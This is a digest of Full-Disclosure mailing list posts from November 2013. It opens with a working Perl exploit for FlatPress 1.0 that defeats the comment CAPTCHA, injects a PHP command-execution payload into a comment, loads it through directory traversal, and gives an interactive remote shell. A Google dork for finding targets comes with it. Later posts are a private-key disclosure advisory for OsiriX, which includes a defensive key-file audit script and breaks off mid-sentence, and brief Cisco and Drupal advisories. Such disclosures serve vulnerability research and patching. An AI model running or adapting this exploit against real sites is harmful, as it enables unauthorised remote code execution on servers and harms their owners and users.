[Full-disclosure] Flatpress version 1.0 remote code execution NULLday

2013-11-06 Thread Wire Ghoul
#!/usr/bin/perl
# Exploit Title: Flatpress remote code execution PoC NULLday
# Google Dork: This site is powered by FlatPress.
# Date: 17/10/2013
# Exploit Author: Wireghoul
# Vendor Homepage: http://flatpress.org/home/
# Software Link: http://downloads.sourceforge.net/project/flatpress/flatpress/FlatPress%201.0%20Solenne/flatpress-1.0-solenne.tar.bz2
# Version: v1.0
#
# Blended threat, executes code injected into comment
# by loading comment as a page through directory traversal
# Requires the inlinePHP plugin to be enabled.
# Written by @Wireghoul - justanotherhacker.com
#
# This is for my peeps and the freaks in the front row -- Hilltop Hoods: Nosebleed section

use strict;
use warnings;
use LWP::UserAgent;

banner();
usage() if (!$ARGV[0]);
# Marker used to find our own comment again among the others
my $injid = 'Spl0ited' . int(rand(1_000_000));
my $ua = LWP::UserAgent->new;
$ua->timeout(10);
$ua->env_proxy;
$ua->cookie_jar({ file => '/tmp/flatpress-rce.txt' });

sub banner {
    print "\nFlatpress remote code execution PoC by \@Wireghoul\n";
    print "===[ justanotherhacker.com ]===\n";
}

sub usage {
    print "Usage: $0 <url>\n";
    exit;
}

# Check whether the inlinePHP plugin is installed at all
my $response = $ua->get("$ARGV[0]/fp-plugins/inlinephp/plugin.inlinephp.php");
if (!$response->is_success) {
    print "[-] Inline PHP plugin not found at $ARGV[0]/fp-plugins/inlinephp/plugin.inlinephp.php\n";
} else {
    print "[+] Inline PHP plugin found, hopefully it is enabled!\n";
}
# Prepare for exploitation, find entry + comment location
$response = $ua->get($ARGV[0]);
if ($response->is_success) {
    if ($response->decoded_content =~ /(http.*?x=entry:entry.*?;comments:1#comments)/) {
        my $cmntlink = $1;
        print "[+] Found comment link: $cmntlink\n";
        # Can't be bothered solving easy captchas, just reload page until we get one we like
        my $aaspam = 0;
        while ($aaspam == 0) {
            $response = $ua->get($cmntlink);
            if ($response->decoded_content =~ /<strong>(\d+) plus (\d+) \? \(\*\)/) {
                $aaspam = $1 + $2;
                print "[+] Defeated antispam $1 + $2 = $aaspam\n";
            } else {
                $response->decoded_content =~ m/<strong>(.*) \? \(\*\)/;
                print "[*] Unknown antispam: $1 ... retrying\n";
            }
        }
        # Post a comment carrying the inlinePHP block between SHELL/LLEHS markers
        $response = $ua->post(
            $cmntlink . 'form',
            Content => {
                'name'    => $injid,
                'email'   => '',
                'url'     => '',
                'aaspam'  => $aaspam,
                'content' => "SHELL[exec]system(\$_GET['cmd']);[/exec]LLEHS",
                'submit'  => 'Add',
            }
        );
        $response = $ua->get($cmntlink);
        # Find link to injected content, then execute pseudo shell in loop
        my @cmnts = split(/<li id="comment/, $response->decoded_content);
        my @injected = grep { /$injid/ } @cmnts;
        if (@injected && $injected[0] =~ /$injid/) {
            print "[+] Injection ($injid) successful\n";
            $injected[0] =~ m/(http.*?)x=entry:entry(\d\d)(\d\d)(\d\d-\d+);comments:1#comment(\d+-\d+)/;
            # The stored comment file is loaded as a page via traversal in the page parameter
            my $shell = "${1}page=../../content/$2/$3/entry$2$3$4/comments/comment$5";
            print "[*] Dropping into shell, type exit to exit\n";
            my $line = '';
            while (1) {
                print '$ ';
                $line = <STDIN>;
                last unless defined $line;
                chomp $line;
                if ($line =~ /^exit$/) { exit; }
                my $output = $ua->get("$shell&cmd=$line");
                $output->decoded_content =~ /SHELL(.*)LLEHS/ms;
                my $clean = $1;
                $clean =~ s/<br \/>//g;
                print "$clean\n";
            }
        } else {
            print "[-] Unable to identify the injection point\n";
        }
    } else {
        print "[-] Comment link not found\n";
    }
} else {
    die $response->status_line;
}
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] CVE-2013-4425: Private key disclosure, Osirix (lite, 64bit and FDA cleared version) (Medical Application)

2013-11-06 Thread Dirk-Willem van Gulik


Private key disclosure, OsiriX (lite, 64bit and FDA cleared version)

CVE-2013-4425 (version 1.09)
CVSS Score: 8.4

Background:
===========

OsiriX is image processing software for DICOM images (files with a .dcm /
.DCM extension) produced by imaging equipment (MRI, CT, PET, PET-CT,
SPECT-CT, ultrasound) commonly used in medical settings.

Certain versions are FDA or otherwise approved for clinical/medical use.

The product is normally configured to connect to a Picture Archiving and
Communication System (PACS) over the network, using protocols such as
DICOM and the HTTP(S) based WADO.

These connections are commonly secured with Transport Layer Security
(TLS). OsiriX requires a public/private key pair (an X.509 certificate
and the corresponding private key) in order to do so.

Required Environment:
=====================

This advisory only applies to OsiriX installations which use TLS for
securing their network connection in conjunction with a strong digital
identity (e.g. a medical-care account, pass, medical-id).

Vulnerability:
==============

During startup of the DICOM listener the private key is extracted (from
the generally well protected/encrypted keychain, chip-card or similar),
copied and then written to a file on the file system. It is then
perfunctorily encrypted with a password that is hardcoded to
'SuperSecretPassword'.

The resulting file (and the entire directory path leading to it) has read
permissions which are totally open (user, group and other).

This means that other users, daemons or subsystems on the same
workstation as OsiriX, systems that have mounted or otherwise have
visibility of the path, and systems that are able to put a symbolic link
in the path, can obtain the private key.

Details:
========

The private and public key are extracted and written out as a temporary
PKCS#12 file (through NSData writeToFile:). This file is then passed to
the (hardcoded) path /usr/bin/openssl, where the openssl 'pkcs12'
subcommand is used to split the file into a PEM encoded public and
private key (opened with fopen(2), which is permissive with regard to
O_NOFOLLOW and O_SYMLINK). The latter is perfunctorily encrypted with
'SuperSecretPassword'. This password is visible in the binary and is
passed as a command line parameter (i.e. visible to 'ps(1)') during
execution.

The PKCS#12 file is then removed. The various write operations honour
things such as tilde expansion and (symbolic) links, thus allowing the
attacker a fair degree of control to re-position the file in a visible
location (a shared volume, a local webserver, a Java(Script)/browser
visible location, an internet cache), especially as the path itself is
also writable for user, group and other.
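An added Python example, not Pixmeo's code and not from the advisory, showing the checks the Details section implies: an audit of a key file for the open permissions, symlink and world-writable parent directory described above, a writer that creates the file with O_EXCL|O_NOFOLLOW and mode 0600, and an openssl pkcs12 argv that takes the output passphrase from an inherited file descriptor ('-passout fd:N') rather than 'pass:...' on the command line where ps(1) would show it. All paths and key contents are constructed.

```python
import os
import stat
import tempfile


def audit_key_file(path):
    """Return the findings the advisory describes for a private key on disk:
    symlinked path, group/other readable file, world-writable parent dir."""
    findings = []
    st = os.lstat(path)
    if stat.S_ISLNK(st.st_mode):
        findings.append("path is a symlink; writer did not use O_NOFOLLOW")
    if st.st_mode & (stat.S_IRGRP | stat.S_IROTH):
        findings.append("key readable by group/other")
    parent = os.path.dirname(os.path.abspath(path))
    pst = os.stat(parent)
    if pst.st_mode & stat.S_IWOTH and not pst.st_mode & stat.S_ISVTX:
        findings.append("parent directory world-writable without sticky bit")
    return findings


def write_private_key(path, pem_bytes):
    """Create the key file safely: O_EXCL refuses a pre-planted file or link,
    O_NOFOLLOW refuses a symlink, mode 0o600 keeps other users out."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(path, flags, 0o600)
    try:
        os.fchmod(fd, 0o600)  # in case the process umask was permissive
        os.write(fd, pem_bytes)
    finally:
        os.close(fd)
    return path


def openssl_pkcs12_argv(p12_path, key_out, pass_fd):
    """argv for 'openssl pkcs12' that reads the output passphrase from an
    inherited fd ('-passout fd:N') instead of 'pass:...' in argv, which
    ps(1) would show to every user on the workstation."""
    return ["/usr/bin/openssl", "pkcs12", "-in", p12_path, "-nocerts",
            "-out", key_out, "-passout", "fd:%d" % pass_fd]


def demo():
    """Constructed demonstration: one key written safely, one the old way.
    Returns (findings for the safe file, findings for the weak file,
    whether a second write to the safe path was refused by O_EXCL)."""
    workdir = tempfile.mkdtemp(prefix="osirix-demo-")
    good = write_private_key(os.path.join(workdir, "good.pem"),
                             b"-- constructed key material --\n")
    weak = os.path.join(workdir, "weak.pem")
    with open(weak, "wb") as f:      # plain create: mode follows the umask
        f.write(b"-- constructed key material --\n")
    os.chmod(weak, 0o644)            # world-readable, as in the advisory
    try:
        write_private_key(good, b"x")
        excl_refused = False
    except FileExistsError:
        excl_refused = True
    return audit_key_file(good), audit_key_file(weak), excl_refused
```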

Impact:
=======

Full disclosure of the user's private key, and hence full negation of any
and all privacy and authentication security measures of the TLS channel.
The attacker can impersonate the user and/or decrypt (past) communications.

As it is common in medical settings to use a single (personal) X.509
certificate for enterprise/hospital wide authentication and privacy
protection, the attacker will also gain access to all other systems
thus protected.

Work around or mitigation for existing installations:
=====================================================

None (other than disabling the use of TLS/security).

Solution:
=========

Mitigate by upgrading to version 5.8.2 or 2.5-MD.

As of version 5.8/2.5-MD, the vendor no longer uses the hardcoded
'SuperSecretPassword', but instead generates a dynamic token which is held
in in-process memory and otherwise not saved directly.

Therefore upgrading to U2.5-MD mitigates this issue. This is documented
in the vendor's release notes as:

[MD-670] - CVE-2013-4425 : Private key disclosure, Osirix

Note that this mitigation does not address subsequent security issues
(such as the VM paging these out, inter-process memory visibility and so
on). Furthermore, during execution of the /usr/bin/openssl command the
password is part of the command line and hence visible through tools
such as 'ps(1)' to all users on the system.

This fix has not yet been propagated to the unsupported open-source
version, and no timeline for this is available at the time of this
release.

Versions affected:
==================

All versions up to and including 5.7.1/2.7-MD. The fix was introduced in
version 5.8 and 2.8-MD.

Vendor contact:
===============

Pixmeo SARL
266 Rue de Bernex
CH-1233 Bernex
Switzerland

Caveats and Vendor certifications affected:
===========================================

OsiriX MD is cleared as a 510k class II medical device, according to US
Food And Drug Regulation CFR21 part 820
(http://www.accessdata.fda.gov/cdrh_docs/pdf10/K101342.pdf).

OsiriX MD complies with European Directive 93/42/EEC concerning medical
devices. Under this directive, it is regarded as a class IIa (CE-0029,
Apra Gaz, Bruxelles, Belgium) product.

Both these certifications set out 

[Full-disclosure] Cisco Security Advisory: Cisco TelePresence VX Clinical Assistant Administrative Password Reset Vulnerability

2013-11-06 Thread Cisco Systems Product Security Incident Response Team

Cisco Security Advisory: Cisco TelePresence VX Clinical Assistant 
Administrative Password Reset Vulnerability

Advisory ID: cisco-sa-20131106-tvxca

Revision 1.0

For Public Release 2013 November 6 16:00  UTC (GMT)

+-

Summary
===

A vulnerability in the WIL-A module of Cisco TelePresence VX Clinical Assistant 
could allow an unauthenticated, remote attacker to log in as the admin user of 
the device using a blank password.

The vulnerability is due to a coding error that resets the password for the 
admin user to a blank password on every reboot. An attacker could exploit this 
vulnerability by logging in to the administrative interface as the admin user 
with a blank password.

Cisco has released free software updates that address this vulnerability. This 
advisory is available at the following link:

http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20131106-tvxca




[Full-disclosure] Cisco Security Advisory: Cisco IOS Software Session Initiation Protocol Denial of Service Vulnerability

2013-11-06 Thread Cisco Systems Product Security Incident Response Team

Cisco Security Advisory: Cisco IOS Software Session Initiation Protocol Denial 
of Service Vulnerability

Advisory ID: cisco-sa-20131106-sip

Revision 1.0

For Public Release 2013 November 6 16:00  UTC (GMT)

+-

Summary
===

A vulnerability exists in the Session Initiation Protocol (SIP) implementation 
in Cisco IOS Software that could allow an unauthenticated, remote attacker to 
cause a reload of an affected device or cause memory leaks that may result in 
system instabilities. To exploit this vulnerability, affected devices must be 
configured to process SIP messages. Limited Cisco IOS Software releases are 
affected.

Cisco has released free software updates that address this vulnerability.

There are no workarounds for devices that must run SIP; however, mitigations 
are available to limit exposure to the vulnerability.

This advisory is available at the following link:

http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20131106-sip




[Full-disclosure] Cisco Security Advisory: Cisco WAAS Mobile Remote Code Execution Vulnerability

2013-11-06 Thread Cisco Systems Product Security Incident Response Team

Cisco Security Advisory

Cisco WAAS Mobile Remote Code Execution Vulnerability

Advisory ID: cisco-sa-20131106-waasm

Revision 1.0

For Public Release 2013 November 6 16:00  UTC (GMT)

+--

Summary
===

Cisco Wide Area Application Services (WAAS) Mobile contains a vulnerability 
that could allow an unauthenticated, remote attacker to execute arbitrary code 
on the Cisco WAAS Mobile server with the privileges of the Microsoft Internet 
Information Services (IIS) web server.

Cisco has released free software updates that address this vulnerability. This 
advisory is available at the following link:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20131106-waasm



[Full-disclosure] [Security-news] SA-CONTRIB-2013-087 - Payment for Webform - Access Bypass

2013-11-06 Thread security-news
View online: https://drupal.org/node/2129373

   * Advisory ID: DRUPAL-SA-CONTRIB-2013-087
   * Project: Payment for Webform [1] (third-party module)
   * Version: 7.x
   * Date: 2013-November-06
   * Security risk: Not critical [2]
   * Exploitable from: Remote
   * Vulnerability: Access bypass

 DESCRIPTION
-----------

This module enables you to ask for or require payments before users can
submit webforms. It previously allowed anonymous users to sometimes use other
anonymous users' payments when submitting a form. Payment for Webform never
supported anonymous users, but there was also nothing that prevented them
from using the Webform component.

This vulnerability is mitigated by the fact that an attacker must be
anonymous and that other anonymous users must have made payments that have
not been used for submitting a webform yet. It does not compromise sites'
security, nor does it allow anonymous users to do anything they would not
have been able to do, if they had made a payment themselves.


 CVE IDENTIFIER(S) ISSUED
------------------------

   * A CVE identifier [3] will be requested, and added upon issuance, in
     accordance with Drupal Security Team processes.

 VERSIONS AFFECTED
-----------------

   * Payment for Webform 7.x-1.x versions prior to 7.x-1.5.

Drupal core is not affected. If you do not use the contributed Payment for
Webform [4] module, there is nothing you need to do.

 SOLUTION
--------

Install the latest version:

   * If you use the Payment for Webform module for Drupal 7.x, upgrade to
 7.x-1.5 [5]

Additionally, if you have any forms that use the component and are accessible
to anonymous users, you may need to update those to prevent form validation
errors.

Also see the Payment for Webform [6] project page.

 REPORTED BY
-----------

   * Herman van Rink [7] (helmo)
   * Clemens Tolboom [8] (clemens.tolboom)
   * Greg Knaddison [9] (greggles) of the security team

 FIXED BY
--------

   * Bart Feenstra [10] (Xano), the module maintainer

 COORDINATED BY
--------------

   * Greg Knaddison [11] of the Drupal Security Team

 CONTACT AND MORE INFORMATION
----------------------------

The Drupal security team can be reached at security at drupal.org or via the
contact form at http://drupal.org/contact [12].

Learn more about the Drupal Security team and their policies [13], writing
secure code for Drupal [14], and securing your site [15].


[1] http://drupal.org/project/payment_webform
[2] http://drupal.org/security-team/risk-levels
[3] http://cve.mitre.org/
[4] http://drupal.org/project/payment_webform
[5] https://drupal.org/node/2128345
[6] http://drupal.org/project/payment_webform
[7] https://drupal.org/user/449000
[8] https://drupal.org/user/125814
[9] https://drupal.org/user/36762
[10] https://drupal.org/user/62965
[11] http://drupal.org/user/36762
[12] http://drupal.org/contact
[13] http://drupal.org/security-team
[14] http://drupal.org/writing-secure-code
[15] http://drupal.org/security/secure-configuration

___
Security-news mailing list
security-n...@drupal.org
Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news



[Full-disclosure] [Security-news] SA-CONTRIB-2013-089 - Node Access Keys - Access Bypass

2013-11-06 Thread security-news
View online: https://drupal.org/node/2129379

   * Advisory ID: DRUPAL-SA-CONTRIB-2013-089
   * Project: Node Access Keys [1] (third-party module)
   * Version: 7.x
   * Date: 2013-November-06
   * Security risk: Moderately critical [2]
   * Exploitable from: Remote
   * Vulnerability: Access bypass

 DESCRIPTION
-----------

Node Access Keys helps to grant users temporary view permissions to selected
content types on a per user role basis. However, it only implements
hook_node_access() and not hook_query_alter(), which means any listing of
nodes does not respect the node view access.


 CVE IDENTIFIER(S) ISSUED
------------------------

   * A CVE identifier [3] will be requested, and added upon issuance, in
     accordance with Drupal Security Team processes.

 VERSIONS AFFECTED
-----------------

   * Node Access Keys 7.x-1.0.

Drupal core is not affected. If you do not use the contributed Node Access
Keys [4] module, there is nothing you need to do.

 SOLUTION
--------

Install the latest version:

   * If you use the Node Access Keys module for Drupal 7.x, upgrade to Node
 Access Keys 7.x-1.1 [5]

Also see the Node Access Keys [6] project page.

 REPORTED BY
-----------

   * Daniel Korte [7], the module maintainer

 FIXED BY
--------

   * Daniel Korte [8], the module maintainer

 COORDINATED BY
--------------

   * Greg Knaddison [9] of the Drupal Security Team
   * Ben Jeavons [10] of the Drupal Security Team

 CONTACT AND MORE INFORMATION
----------------------------

The Drupal security team can be reached at security at drupal.org or via the
contact form at http://drupal.org/contact [11].

Learn more about the Drupal Security team and their policies [12], writing
secure code for Drupal [13], and securing your site [14].


[1] http://drupal.org/project/nodeaccesskeys
[2] http://drupal.org/security-team/risk-levels
[3] http://cve.mitre.org/
[4] http://drupal.org/project/nodeaccesskeys
[5] https://drupal.org/node/2125239
[6] http://drupal.org/project/nodeaccesskeys
[7] http://drupal.org/user/453668
[8] http://drupal.org/user/453668
[9] http://drupal.org/user/36762
[10] http://drupal.org/user/91990
[11] http://drupal.org/contact
[12] http://drupal.org/security-team
[13] http://drupal.org/writing-secure-code
[14] http://drupal.org/security/secure-configuration



[Full-disclosure] [Security-news] SA-CONTRIB-2013-088 - Secure Pages - Missing Encryption of Sensitive Data

2013-11-06 Thread security-news
View online: https://drupal.org/node/2129381

   * Advisory ID: DRUPAL-SA-CONTRIB-2013-088
   * Project: Secure Pages [1] (third-party module)
   * Version: 6.x
   * Date: 2013-November-06
   * Security risk: Less critical [2]
   * Exploitable from: Remote
   * Vulnerability: Missing Encryption of Sensitive Data

 DESCRIPTION
-----------

The Secure Pages module manages redirects between HTTP and HTTPS pages.

A flaw in the URL path matching could lead some pages and forms to be
transmitted via plain HTTP, even if the administrator intended those pages to
use HTTPS. This flaw may surface either due to a malicious user enticing a
user to land on a specially constructed page or through normal interactions
with the site.


 CVE IDENTIFIER(S) ISSUED
------------------------

   * A CVE identifier [3] will be requested, and added upon issuance, in
     accordance with Drupal Security Team processes.

 VERSIONS AFFECTED
-----------------

   * Secure Pages 6.x-2.x versions prior to 6.x-2.0.

Drupal core is not affected. If you do not use the contributed Secure Pages
[4] module, there is nothing you need to do.

 SOLUTION
--------

Install the latest version:

   * If you use the Secure Pages module for Drupal 6.x, upgrade to Secure
     Pages 6.x-2.0 [5]

Also see the Secure Pages [6] project page.

 REPORTED BY
-----------

   * Balazs Nagykekesi [7]

 FIXED BY
--------

   * Balazs Nagykekesi [8]
   * Dylan Tack [9] of the Drupal Security Team, module maintainer

 COORDINATED BY
--------------

   * Klaus Purer [10] of the Drupal Security Team

 CONTACT AND MORE INFORMATION
----------------------------

The Drupal security team can be reached at security at drupal.org or via the
contact form at http://drupal.org/contact [11].

Learn more about the Drupal Security team and their policies [12], writing
secure code for Drupal [13], and securing your site [14].


[1] http://drupal.org/project/securepages
[2] http://drupal.org/security-team/risk-levels
[3] http://cve.mitre.org/
[4] http://drupal.org/project/securepages
[5] https://drupal.org/node/2128739
[6] http://drupal.org/project/securepages
[7] http://drupal.org/user/21231
[8] http://drupal.org/user/21231
[9] http://drupal.org/user/96647
[10] http://drupal.org/user/262198
[11] http://drupal.org/contact
[12] http://drupal.org/security-team
[13] http://drupal.org/writing-secure-code
[14] http://drupal.org/security/secure-configuration
